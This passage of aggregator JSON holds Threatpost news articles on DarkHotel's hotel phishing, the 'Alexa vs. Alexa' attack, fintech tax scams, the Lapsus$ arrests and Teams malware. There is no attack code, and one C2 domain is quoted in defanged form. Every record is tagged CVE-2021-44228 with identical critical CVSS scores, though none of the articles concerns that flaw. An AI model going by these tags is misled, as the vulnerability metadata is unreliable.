"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T17:14:57", "type": "threatpost", "title": "Cyberattackers Target UPS Back-Up Power Devices in Mission-Critical Environments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T17:14:57", "id": "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "href": "https://threatpost.com/cyberattackers-ups-backup-power-critical-environments/179169/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T18:54:13", "description": "An advanced persistent threat (APT) group has been targeting luxury hotels in Macao, China with a spear-phishing campaign aimed at breaching their networks and stealing the sensitive data of high-profile guests staying at resorts, including the Grand Coloane Resort and Wynn Palace.\n\nA threat research report from Trellix \u201ccautiously\u201d identified the South Korean [DarkHotel APT group](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html>) as the culprit behind the attacks.\n\nThe researchers said the spear-phishing campaign began at the tail end of November, with emails loaded with malicious Excel macros being sent to ranking hotel management with access to hotel networks, including human resources and office managers.\n\nIn one attack wave, phishing emails were sent to 17 different hotels on Dec. 7 and faked to look like they were sent from the Macao Government Tourism Office, to gather information about who was staying at the hotels. The emails asked the recipient to open an attached Excel file labeled \u201cpassenger inquiry.\u201d\n\n\u201cPlease open the attached file with enable content and specify whether the people were staying at the hotel or not?\u201d the malicious email read, according to the threat researchers with Trellix. The communication was signed from the \u201cInspection Division \u2013 MGTO.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png>)\n\nThe DarkHotel attack flow. Source: Trellix.\n\nTrellix was able to attribute the attacks to DarkHotel with a \u201cmoderate\u201d level of confidence due to the IP address for the command-and-control server (C2), which was previously attached to the group; the targeting of hotels, which DarkHotel is already infamous for; and patterns found in the C2 setup which match known DarkHotel activities, the report said.\n\n\u201cHowever, we have lowered our confidence level to moderate because the specific IP address remained active for quite some time even after being publicly exposed, and the same IP address is the origin of other malicious content not related to this specific threat,\u201d the Trellix team said. \u201cThese two observations have made us more cautious in our attribution.\u201d\n\n## **DarkHotel Suspected of Stealing Data for Future Attacks **\n\nOnce opened, the macros contacted the C2 server to begin data exfiltration from the hotel networks, the Trellix team explained.\n\n\u201cThe command-and-control server, hxxps://fsm-gov(.)com, used to spread this campaign was trying to impersonate a legitimate government website domain for the Federated States of Micronesia,\u201d Trellix\u2019s report added. \u201cHowever, the real Micronesia website domain is \u2018fsmgov.org.'\u201d\n\nThe Trellix team said they suspected the attackers were collecting data to be used later.\n\n\u201cAfter researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor,\u201d the Trellix researchers reported. \u201cFor instance, one hotel was hosting an International Environment Forum and an International Trade &amp; Investment Fair, both of which would attract potential espionage targets.\u201d\n\nThe spear-phishing campaign stopped on Jan. 18, the team said.\n\n## **COVID-19 Stalls Campaign **\n\nThat said, the COVID-19 pandemic cancelled or delayed these events, giving law enforcement time to catch on. By Dec. 2021, the Macao Security Force Bureau received a notification from the Cyber Security Incident Alert and Emergency Response Center of the police department that a domain similar to the official Security Force page was being used to spread malware and \u201ccommit illegal acts.\u201d\n\nBesides targeting hotels, other campaigns attributed to the same C2 IP address, believed to be controlled by DarkHotel, included going after MetaMask crypto users with a spoofed Collab.Land phishing page, the Trellix report added.\n\nDarkHotel has a long history of targeting Chinese victims. In April 2020, the APT group went after Chinese virtual private network (VPN) service provider SangFor, used by several Chinese government agencies. By the end of the first week of that month, at least 200 endpoints had been compromised, according to reports.\n\nAround the same time, at the start of the COVID-19 pandemic, [DarkHotel targeted the systems of the World Health Organization](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nAttacks like these show how attractive data stored in hotel networks can be for threat actors. Hotel operators should recognize that cybersecurity needs to reach beyond their networks\u2019 edge, the Trellix team advised. Travelers likewise need to take appropriate security precautions, Trellix added.\n\n\u201cOnly bring the essential devices with limited data, keep security systems up to date and make use of a VPN service when using hotel Wi-Fi,\u201d the report said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T18:53:40", "type": "threatpost", "title": "DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T18:53:40", "id": "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "href": "https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-08T18:32:41", "description": "UPDATE\n\nResearchers from the University of London and the University of Catania have discovered how to weaponize Amazon Echo devices to hack themselves.\n\nThe \u2013 dubbed \u201cAlexa vs. Alexa\u201d \u2013 leverages what the researchers called \u201ca command self-issue vulnerability\u201d: using pre-recorded messages which, when played over a 3rd\u2013 or 4th-generation Echo speaker, causes the speaker to perform actions on itself.\n\n## How to Make Alexa Hack Itself\n\nSmart speakers lay dormant during the day, waiting for a user to vocalize a particular activation phrase: i.e., \u201cHey, Google,\u201d \u201cHey, Cortana\u201d or, for the Amazon Echo, \u201cAlexa,\u201d or simply, \u201cEcho.\u201d Usually, of course, it\u2019s the device\u2019s owner who issues such commands.\n\nHowever, researchers found that \u201cself-activation of the Echo device [also] happens when an audio file reproduced by the device itself contains a voice command.\u201d And even if the device asks for a secondary confirmation, in order to perform a particular action, \u201cthe adversary only has to always append a \u2018yes\u2019 approximately six seconds after the request to be sure that the command will be successful.\u201d\n\nTo get the device to play a maliciously crafted recording, an attacker would need a smartphone or laptop in Bluetooth-pairing range. Unlike internet-based attacks, this scenario requires proximity to the target device. This physical impediment is balanced by the fact that, as the researchers noted, \u201conce paired, the Bluetooth device can connect and disconnect from Echo without any need to perform the pairing process again. Therefore, the actual attack may happen several days after the pairing.\u201d\n\nAlternatively, the report stated, attackers could use an internet radio station, beaming to the target Echo like a command-and-control server. This method \u201cworks remotely and can be used to control multiple devices at once,\u201d but would required extra steps, including tricking the targeted user into downloading a malicious [Alexa \u201cskill\u201d](<https://threatpost.com/researchers-hacked-amazons-alexa-to-spy-on-users-again/131401/>) (app) to an Amazon device.\n\nUsing the Alexa vs. Alexa attack, attackers could tamper with applications downloaded to the device, make phone calls, place orders on Amazon, eavesdrop on users, control other connected appliances in a user\u2019s home and more.\n\n\u201cThis action can undermine physical safety of the user,\u201d the report stated, \u201cfor example, when turning off the lights during the evening or at nighttime, turning on a smart microwave oven, setting the heating at a very high temperature or even unlocking the smart lock for the front door.\u201d\n\nIn testing their attack, the authors were able to remotely turn off the lights in one of their own homes 93 percent of the time.\n\n## Smart Speakers Are Uniquely Vulnerable\n\nBecause they\u2019re always listening for their wake word, and because they\u2019re so often interconnected with other devices, smart speakers are prone to unique security vulnerabilities. The Echo series of devices, in particular, has been linked with a series of privacy risks, from microphones \u201c[hearing](<https://threatpost.com/hey-alexa-who-messaging/162587/>)\u201d what people text on nearby smartphones to audio recordings being stored [indefinitely](<https://threatpost.com/amazon-admits-alexa-voice-recordings-saved-indefinitely/146225/>) on company servers.\n\nThe physical proximity required for Bluetooth, or having to trick users into downloading malicious skills, limits but does not eliminate the potential for harm in such a scenario as the Alexa vs. Alexa report described, according to John Bambenek, principal threat hunter at Netenrich. Those living in dense cities are potentially at risk, and individuals \u201cat most risk are those in domestic violence scenarios,\u201d he wrote, via email. For that reason, \u201csimply accepting the risk isn\u2019t acceptable.\u201d\n\nThe research prompted Amazon to patch the command self-issue vulnerability, which is the benefit of having a robust threat-hunting culture.\n\n\u201cMost people aren\u2019t evil,\u201d wrote Bambenek. \u201cIt is hard to test new technology against criminal intent because even testers lack the criminal mindset (and that\u2019s a good thing for society). As technology gets adopted, we find things we overlook and make it better.\u201d\n\nFor its part, Amazon gave Threatpost the following statement:\n\n_\u201cAt Amazon, privacy and security are foundational to how we design and deliver every device, feature, and experience. We appreciate the work of independent security researchers who help bring potential issues to our attention, and are committed to working with them to secure our devices. We fixed the remote self-wake issue with Alexa Skills caused by extended periods of silence resulting from break tags as demonstrated by the researchers. We also have systems in place to continually monitor live skills for potentially malicious behavior, including silent re-prompts. Any offending skills we identify are blocked during certification or quickly deactivated, and we are constantly improving these mechanisms to further protect our customers.\u201d_\n\nThe latest, patched version of Alexa device software can be found [here](<https://www.amazon.com/gp/help/customer/display.html?nodeId=GMB5FVUB6REAVTXY&linkCode=sl2&tag=hothard-20&linkId=070200dafa741d26cbd19cf21d735449&language=en_US&ref_=as_li_ss_tl>).\n\n_This posting was updated on March 8 at 1:30 p.m. ET to include Amazon\u2019s statement. _\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T21:30:12", "type": "threatpost", "title": "Novel Attack Turns Amazon Devices Against Themselves", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T21:30:12", "id": "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "href": "https://threatpost.com/attack-amazon-devices-against-themselves/178797/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:48", "description": "Threat actors have new targets in their sites this tax season during the annual barrage of cyber-scams as people file their U.S. income-tax documents. Novel email campaigns are spoofing popular financial technology (fintech) applications and their tax notifications to try to dupe victims into giving up their credentials, researchers have found.\n\nIt\u2019s common for attackers to target popular tax filing and preparation apps such as [Intuit](<https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/>) and TurboTax in various cybercriminal campaigns during tax season, a time that\u2019s traditionally rife with scams. In 2020, for example, threat actors [targeted small tax-preparation](<https://threatpost.com/latest-tax-scam-target-apps-and-tax-prep-websites/152998/>) firms by planting malicious code on their websites to spread malware to site users.\n\nThis year, attackers have pivoted to take on the personas of fintech apps like [Stash](<https://www.stash.com/>) and [Public](<https://public.com/>) \u201cto steal credentials and give users a false sense of security that they\u2019ve compiled the right tax documents,\u201d according to[ a report](<https://www.avanan.com/blog/hackers-begin-spoofing-fintech-apps-as-tax-season-approaches>) published Thursday by Avanan, a Check Point company.\n\nIn scams observed by Avanan researchers beginning in February, attackers spoof the logo and look and feel of communication that Stash and Public might send to end users to inform them that their tax document is ready, Jeremy Fuchs, Avanan cybersecurity researcher and analyst, wrote in the report.\n\nThe email includes a link to a document \u2013 purportedly associated with the person\u2019s Stash or Public account \u2013 and invites users to use the link to log in to their accounts to access it. When the user clicks on the link, however, they are directed not to a legitimate log-in site, but to one that harvests their credentials, Fuchs said.\n\n## **Rise in Fintech Threats**\n\nFintech is a growing attack surface for threat actors due to the sheer increase in its user base in the last couple of years, primarily attributed by researchers to the pandemic-related increase in people\u2019s overall time online.\n\nAccording to [a study](<https://plaid.com/blog/report-the-fintech-effect-2021/>) by fintech startup Plaid, 88 percent of people in the United States were using some form of fintech by late 2021 \u2013 a rise of 52 percent from the 58 percent of people who reported using fintech in 2020.\n\nSurprisingly, that\u2019s more than the number of people in the United States who use streaming services or social media, making fintech an attractive target for threat actors, Fuchs wrote. \u201cThat gives hackers a wide range of people to steal credentials from,\u201d he said.\n\nThreat actors began an early foray into targeting fintech users during tax season by targeting online investment service Robinhood [last April](<https://threatpost.com/robinhood-warns-customers-of-tax-season-phishing-scams/165180/>) in a similar way to this year\u2019s campaigns spoofing Stash and Public. At the time, researchers discovered an attack vector that used phishing emails with links to fake Robinhood websites prompting visitors to enter their login credentials.\n\n## **Catching Users Off Guard**\n\nFintech companies are also an attractive target because these types of scams can catch users by surprise, Fuchs noted.\n\n\u201cThey may not be expecting tax documents from these apps, inducing them to click,\u201d he wrote in the report. \u201cSince most of these services are mobile-first, users may receive this on their phone and may forget about typical cyber hygiene.\u201d\n\nOn the contrary, people should be at their most diligent when receiving any emails regarding tax forms or services, given that clicking on the wrong link, especially while connected to a corporate network, can have dire consequences, Fuchs said.\n\nTo keep networks safe during tax season, Avanan is advising security professionals\n\nto encourage end-users to check URLs before clicking on tax-related emails, as well as to ask users to log in directly to the financial institution when receiving tax-notification emails while at work. They also suggest security admins urge end-users to reach out to the company\u2019s IT department if they are unsure if an email is legitimate or not.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:16", "type": "threatpost", "title": "Tax-Season Scammers Spoof Fintechs, Including Stash, Public", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:16", "id": "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "href": "https://threatpost.com/tax-season-scammers-spoof-fintechs-stash-public/179071/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T21:25:13", "description": "City of London Police have arrested seven people suspected of being connected to the Lapsus$ gang.\n\nThe bust came within hours of Bloomberg having published a [report](<https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8>) about a teenage boy living at his mother\u2019s house near Oxford, England who\u2019s suspected of being the Lapsus$ mastermind.\n\nThe police haven\u2019t verified whether or not they nabbed the Oxford teen, per se.\n\nAt any rate, given that he\u2019s a minor, it would be illegal to identify him: According to security journalist [Brian Krebs](<https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/>), the teen is 17, though the [BBC](<https://www.bbc.com/news/technology-60864283>) pegs his age at 16.\n\nBut for what it\u2019s worth, all of the suspects are young. In a statement given to [TechCrunch](<https://techcrunch.com/2022/03/24/london-police-lapsus-arrests/>), the City of London Police said the seven are between 16 and 21: \u201cThe City of London Police has been conducting an investigation with its partners into members of a hacking group,\u201d according to Detective Inspector Michael O\u2019Sullivan. \u201cSeven people between the ages of 16 and 21 have been arrested in connection with this investigation and have all been released under investigation. Our enquiries remain ongoing.\u201d\n\nInvestigators reportedly told Bloomberg that another member of Lapsus$ is suspected to be a teenager residing in Brazil. There could well be more: Another investigator told the outlet that security researchers have identified seven unique accounts associated with Lapsus$, \u201cindicating that there are likely others involved in the group\u2019s operations.\u201d\n\n## Busy Beavers\n\nOver the past few months, Lapsus$ \u2013 a data extortion group \u2013 has targeted [Brazil\u2019s Ministry of Health](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) and the gaming giant [Ubisoft](<https://www.toolbox.com/it-security/security-general/news/lapsus-ubisoft-security-incident/>), [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media kingpin Impresa, and, in recent weeks, eviscerated tech giants including [Samsung](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>), [Nvidia](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), [Microsoft](<https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/>) and [Okta](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>).\n\nAllison Nixon**,** chief research officer at [Unit 221B](<https://www.unit221b.com/>), is one of the researchers who\u2019ve been tracking the Oxford teen, who, researchers say, goes by the online aliases \u201cWhite,\u201d \u201cBreachbase\u201d or \u201cOklaqq,\u201d among other names\n\nShe\u2019s been working with researchers at security firm Palo Alto Networks to track individual members of LAPSUS$ even prior to the group\u2019s formation. Nixon told KrebsOnSecurity that she\u2019s convinced that the White/OklAGG individual is the head honcho, given that, among other things, theidentity has been tied to the Lapsus$ group\u2019s recruiting message for company insiders to help them penetrate targeted organizations.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23105813/lapsus-recruitment-ad-e1648047507406.png>)\n\nThe Lapsus$ gang\u2019s recruitment ad for rogue employees.\n\nNixon told the BBC that researchers have had the Oxford teen\u2019s name since the middle of last year and that they\u2019d identified him even before he was doxed by a hacking forum \u2013 Doxbin, a site where people can post or sift through the personal data of hundreds of thousands of people for the purpose of doxing \u2013that he\u2019d allegedly purchased and then run as a lousy, much-complained-about admin.\n\nHe wound up selling the forum back to its previous owner, at a loss, then leaked the entire Doxbin dataset, leading to the Doxbin community turning around and doxing him right back. That included what Krebs reported as \u201cvideos supposedly shot at night outside his home in the United Kingdom,\u201d along with his name, address, and social media pictures.\n\nThe Doxbin community also posted a curriculum vitae of his hacking career, the BBC reported \u2013 a career that made him filthy rich in short order. His Doxbin entry connected him to Lapsus$, as well. The entry reportedly reads:\n\n> \u201c[He] slowly began making money to further expand his exploit collection. \u2026 After a few years his net worth accumulated to well over 300BTC (close to $14 mil). \u2026 [He] now is affiliated with a wannabe ransomware group known as \u2018Lapsus$\u2019, who has been extorting &amp; \u2018hacking\u2019 several organisations.\u201d \u2014Doxbin entry, per the BBC\n\nNixon told the BBC that Unit 221B, working with Palo Alto, identified the threat actor and then watched his exploits throughout 2021, \u201cperiodically sending law enforcement a heads-up about the latest crimes.\u201d\n\nShe said that researchers tracked him by \u201cwatching the post history of an account and seeing older posts provide contact information for the guy.\u201d The \u201cWhite\u201d individual also helped, she said, by failing to cover his tracks.\n\n## Get Off My Code, You Damn Kids\n\nAfter its breaches, Lapsus$ has posted stolen source code on the group\u2019s Telegram channel, including code stolen from Microsoft\u2019s Azure DevOps server for the company\u2019s Bing and Cortana products. Lapsus$ has also posted screenshots of Okta\u2019s Slack channels and the interface for Cloudflare, which is one of thousands of customers that use Okta\u2019s technology to provide authentication for its employees.\n\nIn February, the group also [stole](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>) two of Nvidia\u2019s code-signing certificates \u2013 certificates that were then used to sign malware, enabling malicious programs to slide past security safeguards on Windows machines.\n\nAfter its headline-grabbing attacks on Microsoft and Okta this past weekend, Lapsus$ announced on Tuesday that it was going to take a bit of a breather.\n\n\u201cA few of our members has a vacation until 30/3/2022. We might be quiet for some times,\u201d the hackers wrote in the group\u2019s Telegram channel. \u201cThanks for understand us. \u2013 we will try to leak stuff ASAP.\u201d\n\n## Why\u2019d You Do It?\n\nKen Westin, director of security strategy at Cybereason, said it\u2019s tough to guess at the motivation of the purported \u201cmastermind\u201d teen. \u201cMany had speculated it was an organized cybercrime syndicate or potential nation state actors,\u201d he told Threatpost in an email on Thursday.\n\nWhatever the teen\u2019s motivation \u2013 he\u2019s described as having autism, for whatever that\u2019s worth \u2013 Westin thinks the security community underestimates the younger generation. \u201cWe forget teens today have not only grown up with computers, but also have access to an unprecedented number of educational resources on programming and offensive security,\u201d he said.\n\n\u201cI speculated the group was young based on their modus operandi, or lack thereof, it was as if they were surprised by their success and were not sure what to do with it. In some of their follow up communications their language appeared more interested in the notoriety and [was] defensive of their capabilities and accomplishments than any financial motivation,\u201d he continued.\n\nOf course, when it comes to guessing what somebody\u2019s motivation might be for taking on the world\u2019s shiniest tech companies, et al., there\u2019s always that purported 300BTC income that Doxbin pointed to. Not too shabby a motivation, that, particularly when planted in the still-developing brain of a tot that\u2019s been put under glass during the pandemic.\n\n\u201cToday, teens have seen how much money is being made in criminal hacking, in some ways they are the new rockstars,\u201d Westin said. \u201cYou pair this with the fact kids have been couped up for three years often with nothing but the internet to entertain themselves and we shouldn\u2019t be surprised we have skilled hackers. The problem is that their brains are still developing and the line between fun and crime can get blurred, where it\u2019s common for kids to hack to gain notoriety amongst their peers, but this easily crosses over into decisions that can affect the rest of their lives.\u201d\n\nIt\u2019s too early to say whether this will be the end of Lapsus$, he said. \u201cit could still be a false flag, bad attribution, or even framing someone for the hacks. If it is this 16-year-old in England, it is likely we will see an end to the group\u2019s activity, unless one of their partners in cybercrime takes up the mantle.\u201d\n\nWhether Lapsus$ boils down to a criminal gang or a teenager from Oxford, what matters is that the \u201corganization\u201d clearly has the ability to infiltrate some of the world\u2019s largest organizations at a speed that makes these attacks impossible to prevent using traditional perimeter defense tools, said Darren Williams, founder and CEO of privacy/security/prevention firm BlackFog.\n\nWe can\u2019t stick all teenagers in suspended animation until their brains are fully formed, but we can take note of how these groups/individuals stick it to targeted organizations. In an email to Threatpost on Thursday, Williams noted that more than 84 percent of all attacks involve data exfiltration, exposing data on the Dark Web and/or public web sites.\n\n\u201cBy refocusing security efforts on anti-data exfiltration, organizations are able to mitigate extortion attempts, regulatory fines, reports and ultimately the loss of trust in the business,\u201d Williams suggested.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T21:23:30", "type": "threatpost", "title": "UK Cops Collar 7 Suspected Lapsus$ Gang Members", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T21:23:30", "id": "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "href": "https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:44", "description": "Threat actors are targeting Microsoft Teams users by planting malicious documents in chat threads that execute Trojans that ultimately can take over end-user machines, researchers have found.\n\nIn January, researchers at Avanan, a Check Point Company, began tracking the campaign, which drops malicious executable files in Teams conversations that, when clicked on, eventually take over the user\u2019s computer, according to [a report](<https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations>) published Thursday.\n\n\u201cUsing an executable file, or a file that contains instructions for the system to execute, hackers can install DLL files and allow the program to self-administer and take control over the computer,\u201d cybersecurity researcher and analyst at Avanan Jeremy Fuchs wrote in a report. \u201cBy attaching the file to a Teams attack, hackers have found a new way to easily target millions of users.\u201d\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nCybercriminals long have targeted Microsoft\u2019s ubiquitous document-creation and sharing suite \u2013 the legacy Office and its cloud-based version, [Office 365](<https://threatpost.com/tiny-font-size-email-filters-bec-phishing/176198/>) \u2013 with attacks against individual apps in the suite such as [PowerPoint](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) as well as [business email compromise](<https://threatpost.com/microsoft-365-bec-innovation/163508/>) and other scams.\n\nNow Microsoft Teams \u2013 a business communication and collaboration suite \u2013 is emerging as an [increasingly popular attack surface](<https://threatpost.com/microsoft-teams-phishing-office-365/160458/>) for cybercriminals, Fuchs said.\n\nThis interest could be attributed to its surge in use over the COVID-19 pandemic, as many organization\u2019s employees working remotely relied on the app to collaborate. Indeed, the number of daily active users of Teams [nearly doubled](<blank>) over the past year, increasing from 75 million users in April 2020 to 145 million as of the second quarter of 2021, according to Statista.\n\nThe latest campaign against Teams demonstrates an increased understanding of the collaboration app that will allow attacks against it to increase in both sophistication and volume, Fuchs noted. \u201cAs Teams usage continues to increase, Avanan expects a significant increase in these sorts of attacks,\u201d he wrote.\n\n## **Taking on Teams**** **\n\nIn order to plant malicious documents in Teams, researchers first have to get access to the application, Fuchs noted. This is possible in a number of ways, typically involving an initial [email compromise](<https://threatpost.com/microsoft-teams-tabs-bec/166909/>) through phishing to gain credentials or other access to a network, he said.\n\n\u201cThey can compromise a partner organization and listen in on inter-organizational chats,\u201d Fuchs wrote. \u201cThey can compromise an email address and use that to access Teams. They can steal Microsoft 365 credentials, giving them carte blanche access to Teams and the rest of the Office suite.\u201d\n\nOnce an attacker gains access to Teams, it\u2019s fairly easy to navigate and slip past any security protections, he noted. This is because \u201cdefault Teams protections are lacking, as scanning for malicious links and files is limited,\u201d and \u201cmany email security solutions do not offer robust protection for Teams,\u201d Fuchs wrote.\n\nAnother reason Teams is easy for hackers to compromise is that end users inherently trust the platform, sharing sensitive and even confidential data with abandon while using it, he said.\n\n\u201cFor example, an Avanan analysis of hospitals that use Teams found that doctors share patient medical information practically with no limits on the Teams platform,\u201d Fuchs wrote. \u201cMedical staff generally know the security rules and risk of sharing information via email, but ignore those when it comes to Teams. In their mind, everything can be sent on Teams.\u201d\n\nFurther, nearly every Teams user can invite people from other 